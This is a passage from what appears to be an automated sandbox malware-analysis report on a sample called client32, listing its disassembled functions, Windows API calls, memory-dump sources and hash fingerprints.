                                                                                                • Instruction Fuzzy Hash: E3E0867950022DBFC7149E91DC85EAAF35CEB44269F00C135F96656644D674E84087A4
                                                                                                Function 11027530 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 23sleepthreadCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: EnumExitSleepThreadWindows
                                                                                                • String ID: TapiFix
                                                                                                • API String ID: 1804117399-2824097521
                                                                                                • Opcode ID: 9b936a382379f1639e294998df4fda084f6c97918e753868017fe61e0b06262c
                                                                                                • Instruction ID: 0d22cb111dc1a1c74f2ece42ee292e751dc76676b098746739fa73436add6467
                                                                                                • Opcode Fuzzy Hash: 9b936a382379f1639e294998df4fda084f6c97918e753868017fe61e0b06262c
                                                                                                • Instruction Fuzzy Hash: C7E04838A4167CAFE615DB918D84F56BA989B5535CF810030E4351664597B07940C7A9
                                                                                                Function 1101D410 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetDlgItem.USER32(?,?), ref: 1101D43F
                                                                                                • ShowWindow.USER32(00000000), ref: 1101D446
                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorExitItemLastMessageProcessShowWindowwsprintf
                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
                                                                                                • API String ID: 1319256379-1986719024
                                                                                                • Opcode ID: 8377f77b347f7a331b9e274c23780b90952fd8225b6a3357c05bbe4f1f66010c
                                                                                                • Instruction ID: e0f7042720cd81023d22bad3d6b473d4ff1ed87f82d399384176be7cf1b5ebc2
                                                                                                • Opcode Fuzzy Hash: 8377f77b347f7a331b9e274c23780b90952fd8225b6a3357c05bbe4f1f66010c
                                                                                                • Instruction Fuzzy Hash: D3E04F7594032DBBC7049A95DC89EEAB39CEB54229F008025F92556600E670A84087A0
                                                                                                Function 69D0EB03 Relevance: 6.1, APIs: 4, Instructions: 130COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                                • String ID:
                                                                                                • API String ID: 2782032738-0
                                                                                                • Opcode ID: 08c01935fc771ded5e1dc1816cdb0982bbac6150f0b205de900957a3203d3a0a
                                                                                                • Instruction ID: f9a13422eb449d7823f3456157ea6bdf1a688d76fba681891c709322d94b7ecb
                                                                                                • Opcode Fuzzy Hash: 08c01935fc771ded5e1dc1816cdb0982bbac6150f0b205de900957a3203d3a0a
                                                                                                • Instruction Fuzzy Hash: 5F41D271A00704DBDB14CFA9C8A46AEBBB5FF81360F24863DD46697990D771EA81CB60
                                                                                                Function 69D00080 Relevance: 6.1, APIs: 4, Instructions: 126COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 69CFDBD0: _malloc.LIBCMT ref: 69CFDBE9
                                                                                                  • Part of subcall function 69CFDBD0: wsprintfA.USER32 ref: 69CFDC04
                                                                                                  • Part of subcall function 69CFDBD0: _memset.LIBCMT ref: 69CFDC27
                                                                                                • std::exception::exception.LIBCMT ref: 69D000D2
                                                                                                • __CxxThrowException@8.LIBCMT ref: 69D000E7
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                • String ID:
                                                                                                • API String ID: 1338273076-0
                                                                                                • Opcode ID: 320b3a22e14ba44c9a3511679ec5e63155deb39704c2a96d838c204bdeb486da
                                                                                                • Instruction ID: eee9a45f03a3ae39b7f5f16b5d192df1f6955ab0080fad8de6e4bbcc205f8658
                                                                                                • Opcode Fuzzy Hash: 320b3a22e14ba44c9a3511679ec5e63155deb39704c2a96d838c204bdeb486da
                                                                                                • Instruction Fuzzy Hash: 014181B99003089FD714CFA8D950BAAB7F8FF19604F00856EE95997B41E771FA04CBA1
                                                                                                Function 69CF0B00 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 69CFDBD0: _malloc.LIBCMT ref: 69CFDBE9
                                                                                                  • Part of subcall function 69CFDBD0: wsprintfA.USER32 ref: 69CFDC04
                                                                                                  • Part of subcall function 69CFDBD0: _memset.LIBCMT ref: 69CFDC27
                                                                                                • std::exception::exception.LIBCMT ref: 69CF0BA3
                                                                                                • __CxxThrowException@8.LIBCMT ref: 69CF0BB8
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                • String ID:
                                                                                                • API String ID: 1338273076-0
                                                                                                • Opcode ID: 4ddc8c054ca48c51dc1ea461c22fbd3ed7ffd76aea097ba8c68fa850f837b13f
                                                                                                • Instruction ID: caeab265f5442c5b7f4283bc89adfed68739fafc8485913e7f232a03f5b6d7b2
                                                                                                • Opcode Fuzzy Hash: 4ddc8c054ca48c51dc1ea461c22fbd3ed7ffd76aea097ba8c68fa850f837b13f
                                                                                                • Instruction Fuzzy Hash: 623191B6D00608ABC710CF99D8409AEFBF8FF98614F00C62EE55597B40E774A504CBA1
                                                                                                Function 69CFF9A0 Relevance: 6.1, APIs: 4, Instructions: 121COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 69CFDBD0: _malloc.LIBCMT ref: 69CFDBE9
                                                                                                  • Part of subcall function 69CFDBD0: wsprintfA.USER32 ref: 69CFDC04
                                                                                                  • Part of subcall function 69CFDBD0: _memset.LIBCMT ref: 69CFDC27
                                                                                                • std::exception::exception.LIBCMT ref: 69CFF9F9
                                                                                                • __CxxThrowException@8.LIBCMT ref: 69CFFA0E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                • String ID:
                                                                                                • API String ID: 1338273076-0
                                                                                                • Opcode ID: 148bcc5c5ba9d029167b0c4548b9723045c29165479923fa0fe7a5c7d307ccce
                                                                                                • Instruction ID: b8d82726f891169b14e53468eb6bb485cb0a02bf618f0e51390d2f4d3341ee7d
                                                                                                • Opcode Fuzzy Hash: 148bcc5c5ba9d029167b0c4548b9723045c29165479923fa0fe7a5c7d307ccce
                                                                                                • Instruction Fuzzy Hash: CF3194B5A04204ABC714DF58E840A9AF7F8EF58204F00857EE95A97740F771EA15CBA5
                                                                                                Function 11049130 Relevance: 6.1, APIs: 4, Instructions: 112windowtimeCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 11040700: IsWindow.USER32(?), ref: 11040720
                                                                                                  • Part of subcall function 11040700: GetClassNameA.USER32(?,?,00000040), ref: 11040731
                                                                                                • _malloc.LIBCMT ref: 110491DD
                                                                                                • _memmove.LIBCMT ref: 110491EA
                                                                                                • SendMessageTimeoutA.USER32(?,0000004A,000103BC,?,00000002,00001388,?), ref: 11049224
                                                                                                • _free.LIBCMT ref: 1104922B
                                                                                                  • Part of subcall function 11048FE0: wsprintfA.USER32 ref: 11049013
                                                                                                  • Part of subcall function 11048FE0: WaitForInputIdle.USER32(?,00002710), ref: 11049099
                                                                                                  • Part of subcall function 11048FE0: CloseHandle.KERNEL32(?), ref: 110490AC
                                                                                                  • Part of subcall function 11048FE0: CloseHandle.KERNEL32(?), ref: 110490B5
                                                                                                  • Part of subcall function 11048FE0: Sleep.KERNEL32(00000014), ref: 110490D1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseHandle$ClassIdleInputMessageNameSendSleepTimeoutWaitWindow_free_malloc_memmovewsprintf
                                                                                                • String ID:
                                                                                                • API String ID: 176360892-0
                                                                                                • Opcode ID: f017aac8097ec22e6ff2061411adada1f560574da1a29c4f0254d9f85691612e
                                                                                                • Instruction ID: d41a6b91d128f2eeea48cc74d118894cce712679c930bdd2d1ac7c58a8e7d684
                                                                                                • Opcode Fuzzy Hash: f017aac8097ec22e6ff2061411adada1f560574da1a29c4f0254d9f85691612e
                                                                                                • Instruction Fuzzy Hash: 60316075E0061AABDB04DF94CD81BEEB3B8FF48718F104179E915A7684E731AE05CBA1
                                                                                                Function 69CECC90 Relevance: 6.1, APIs: 4, Instructions: 104COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 69CFDBD0: _malloc.LIBCMT ref: 69CFDBE9
                                                                                                  • Part of subcall function 69CFDBD0: wsprintfA.USER32 ref: 69CFDC04
                                                                                                  • Part of subcall function 69CFDBD0: _memset.LIBCMT ref: 69CFDC27
                                                                                                • std::exception::exception.LIBCMT ref: 69CECCCD
                                                                                                • __CxxThrowException@8.LIBCMT ref: 69CECCE2
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                • String ID:
                                                                                                • API String ID: 1338273076-0
                                                                                                • Opcode ID: 852e38931c9964a8ad8841b651d99b196593b4cc203b1829101b3a327760dbfc
                                                                                                • Instruction ID: 799f5e42eb4b65a4cd8e9ccf4621714e8248d46f568f6fa7442c695d606dae9e
                                                                                                • Opcode Fuzzy Hash: 852e38931c9964a8ad8841b651d99b196593b4cc203b1829101b3a327760dbfc
                                                                                                • Instruction Fuzzy Hash: 57314C74A007089FC728DF58D541C9ABBF8FF58600B10CAAED85A97B60E730EE04CB91
                                                                                                Function 69D1DF86 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 69D1DFBA
                                                                                                • __isleadbyte_l.LIBCMT ref: 69D1DFED
                                                                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?,?,?), ref: 69D1E01E
                                                                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?,?,?), ref: 69D1E08C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                • String ID:
                                                                                                • API String ID: 3058430110-0
                                                                                                • Opcode ID: 45e92bdc118b6b255e5f034e0a05924b3a5b8528ba9acdf0875bb19f07767d2a
                                                                                                • Instruction ID: f4d6528dd22a9097405c61cace8fac012ac16715546286996630a37dfb9bd865
                                                                                                • Opcode Fuzzy Hash: 45e92bdc118b6b255e5f034e0a05924b3a5b8528ba9acdf0875bb19f07767d2a
                                                                                                • Instruction Fuzzy Hash: A031E832A08295EFDB10DF64E980EBE7BB5BF01314F11857AF5618B9A1D731DA40CB60
                                                                                                Function 69CE5950 Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32(69D2B898,00000000,?,?,?,?,?,69CED68F), ref: 69CE596C
                                                                                                • LeaveCriticalSection.KERNEL32(69D2B898,?,?,?,?,?,69CED68F), ref: 69CE597D
                                                                                                • SetEvent.KERNEL32(00000180,?,?,?,?,?,69CED68F), ref: 69CE59B7
                                                                                                • LeaveCriticalSection.KERNEL32(69D2B898,?,?,?,?,?,69CED68F), ref: 69CE59CC
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$Leave$EnterEvent
                                                                                                • String ID:
                                                                                                • API String ID: 3394196147-0
                                                                                                • Opcode ID: a4f39136a5ba91cd420e9f2897e6be29e570f6c1ddb294163d9c5557f08fd10e
                                                                                                • Instruction ID: 554a48897928cf96d4ca329811bc01e89ca33c07a12c70f5bbf36085968fb86d
                                                                                                • Opcode Fuzzy Hash: a4f39136a5ba91cd420e9f2897e6be29e570f6c1ddb294163d9c5557f08fd10e
                                                                                                • Instruction Fuzzy Hash: 1B21BF74D042889FEF00CF68C9157EDBBF4EB4A314F0080AADA4AE7680E7756A05CB90
                                                                                                Function 69CE6830 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 55COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32(69D2B898,?), ref: 69CE68AE
                                                                                                • LeaveCriticalSection.KERNEL32(69D2B898), ref: 69CE68C3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$EnterLeave
                                                                                                • String ID: ERROR$RESULT
                                                                                                • API String ID: 3168844106-833402571
                                                                                                • Opcode ID: 7be118429d56f765cbfc74f61090997795db2c447b66289e159ad984f300a4c3
                                                                                                • Instruction ID: 1aa39730b4bcb167a214d797e4e230c7d209e7f6fef32e4a8d7f1fc5f776d700
                                                                                                • Opcode Fuzzy Hash: 7be118429d56f765cbfc74f61090997795db2c447b66289e159ad984f300a4c3
                                                                                                • Instruction Fuzzy Hash: B60126F2D042452BEB208F60AD01A5F7698DF0119DF459038EB0A87600F639EA1583E2
                                                                                                Function 69CE7360 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 55COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32(69D2B898,?), ref: 69CE73DE
                                                                                                • LeaveCriticalSection.KERNEL32(69D2B898), ref: 69CE73F9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$EnterLeave
                                                                                                • String ID: ERROR$RESULT
                                                                                                • API String ID: 3168844106-833402571
                                                                                                • Opcode ID: 620832381543181f38cb43f6bd74cf51f3c0f8cd9a7d45247752a6d6288f15cf
                                                                                                • Instruction ID: 5da166350ddb365d0a27febc4f0ef130337e1e4923339131224669ce7e5cd50d
                                                                                                • Opcode Fuzzy Hash: 620832381543181f38cb43f6bd74cf51f3c0f8cd9a7d45247752a6d6288f15cf
                                                                                                • Instruction Fuzzy Hash: 140126F3C042412BEB508B70BC01B9F7698DF05199F059038EE4EC7601FA39DA2593E2
                                                                                                Function 69CE7E39 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 49COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32(69D2B898,?,?,?,00000000), ref: 69CE7EB7
                                                                                                • LeaveCriticalSection.KERNEL32(69D2B898,?,?,?,00000000), ref: 69CE7ED0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$EnterLeave
                                                                                                • String ID: RESULT$b
                                                                                                • API String ID: 3168844106-4141403093
